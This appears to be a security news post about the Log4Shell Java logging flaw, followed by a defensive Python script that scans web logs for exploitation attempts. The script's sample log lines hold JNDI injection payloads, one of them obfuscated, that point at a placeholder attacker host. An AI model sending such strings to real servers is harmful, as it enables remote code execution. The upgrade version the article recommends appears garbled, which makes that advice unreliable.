An easy to exploit flaw in the Java logging library Apache Log4j could allow unauthenticated remote code execution (RCE), which could lead to complete server takeover.
The flaw first appeared last week on, of all things, websites related to one of the most popular games in the world, Minecraft. The sites warned that attackers could unleash malicious code on either servers or clients running the Java version of Minecraft by manipulating log messages, including text typed into chat messages.
Before long, the as-yet-unpatched flaw was dubbed “Log4Shell” by researchers, before being tracked as CVE-2021-44228. Then, another group of researchers added that it was seeing attacks on its honeypots coming from the Tor criminal network as threat actors tried to exploit the new bug.
Researchers added that this problem could cause an internet meltdown, given that Log4j is incorporated into lots of popular frameworks, including Apache Struts2, Apache Solr, Apache Druid and Apache Flink. This exposes a number of third-party apps that may also be vulnerable to the same type of high-severity exploits as those spotted in Minecraft, as well as cloud services such as Apple iCloud.
Even though an initial fix was rushed out at the end of last week, this will take time to trickle down to all of the various projects, given how extensively the logging library is incorporated with them downstream.
One example of the bug’s massive reach came from the National Security Agency (NSA), which noted that even its own GHIDRA – a suite of reverse-engineering tools – includes the vulnerable Log4j library.
“The Log4j vulnerability is a significant threat for exploitation due to the widespread inclusion in software frameworks.”
The bug has been assigned the maximum CVSS score of 10, given how easy it is to exploit, the attackers’ ability to seize control of targeted servers and how common Log4j is. According to researchers, the security hole can be exploited by simply getting the application to log a special string.
Security experts added: “This Log4j (CVE-2021-44228) vulnerability is extremely bad. Millions of applications use Log4j for logging, and all the attacker needs to do is get the app to log a special string.”
Some are already comparing this scenario to that of Shellshock, with regards to its huge potential severity. Also known as Bashdoor, Shellshock was a family of security bugs in the Unix Bash shell, present in almost all Linux, UNIX and Mac OS X deployments. Within hours of its disclosure in 2014, Shellshock was being exploited by botnets of compromised computers to perform distributed denial-of-service (DDoS) attacks and vulnerability scanning.
Security researchers have predicted that threat actors will likely include payloads in simple HTTP connections, either in a User-Agent header or trivial POST form data. “Organisations are already seeing signs of exploitation in the wild, which means adversaries will just spray-and-pray across the internet – hoping for some luck.”
It is recommended that organisations that are actively using Apache log4j upgrade to log4j-2.1.50-rc2 as soon as possible. Whether a given deployment is exploitable also depends on its specific configuration. But there are “other attack vectors targeting this vulnerability which can result in Remote Control Execution. Depending on what code is present on the server, an attacker could leverage this existing code to execute a payload.”
Businesses can tell if they’re affected by examining the log files of services that use affected Log4j versions. If those logs contain user-controlled strings, the service could be affected. By adopting an assumed-breach mentality and reviewing the logs of impacted applications for unusual activity, organisations can keep on top of this evolving situation.
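As an added illustration of that log review (example code written for this page, not something the article or any vendor supplies), the script below scans constructed web-server access-log lines for the Log4j lookup syntax in the user-controlled User-Agent field, undoing the common `${lower:…}` / `${::-…}` wrappers first; `attacker.example` is a placeholder host and the log lines are invented.

```python
import re

# Constructed sample access log (Combined Log Format); not real traffic.
# The last quoted field is the User-Agent header, which is attacker-controlled
# and usually written to logs verbatim. attacker.example is a placeholder.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Dec/2021:10:01:07 +0000] "GET /login HTTP/1.1" 200 88 "-" "${jndi:ldap://attacker.example/a}"
203.0.113.9 - - [10/Dec/2021:10:01:09 +0000] "POST /search HTTP/1.1" 200 88 "-" "${${lower:j}ndi:rmi://attacker.example/b}"
198.51.100.2 - - [10/Dec/2021:10:02:00 +0000] "GET /about HTTP/1.1" 200 300 "-" "curl/7.68.0"
"""

# Log4j resolves nested lookups before the jndi lookup runs, so attempts often
# wrap letters in ${lower:x}, ${upper:x} or ${::-x} to dodge naive matching.
_WRAPPERS = [
    re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE),
    re.compile(r"\$\{::-([^{}]*)\}"),
]

def normalise(value: str) -> str:
    """Collapse obfuscation wrappers until the string stops changing."""
    prev = None
    while prev != value:
        prev = value
        for pat in _WRAPPERS:
            value = pat.sub(lambda m: m.group(1), value)
    return value.lower()

def scan_log(text: str) -> list[dict]:
    """One finding per line carrying Log4j lookup syntax.

    'jndi' = direct evidence of an exploitation attempt;
    'lookup' = ${...} in user-controlled data, worth a manual look.
    """
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        norm = normalise(line)
        if "${jndi:" in norm:
            level = "jndi"
        elif "${" in norm:
            level = "lookup"
        else:
            continue
        client_ip = line.split(" ", 1)[0]
        findings.append({"line": lineno, "level": level, "client_ip": client_ip})
    return findings
```

Run `scan_log` over a real access log to get the line numbers and source IPs to pivot on; the `lookup` tier will also catch benign templating, so treat it as a review queue rather than an alert.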
Neuways advises businesses that are concerned by the flaw to contact their software providers to ensure that patches have been applied and that all software the business uses is secure, as well as contacting their MSP. Some businesses may have CRM or accounting software that isn’t managed by their MSP, so it is important that all bases are covered to ensure complete safety.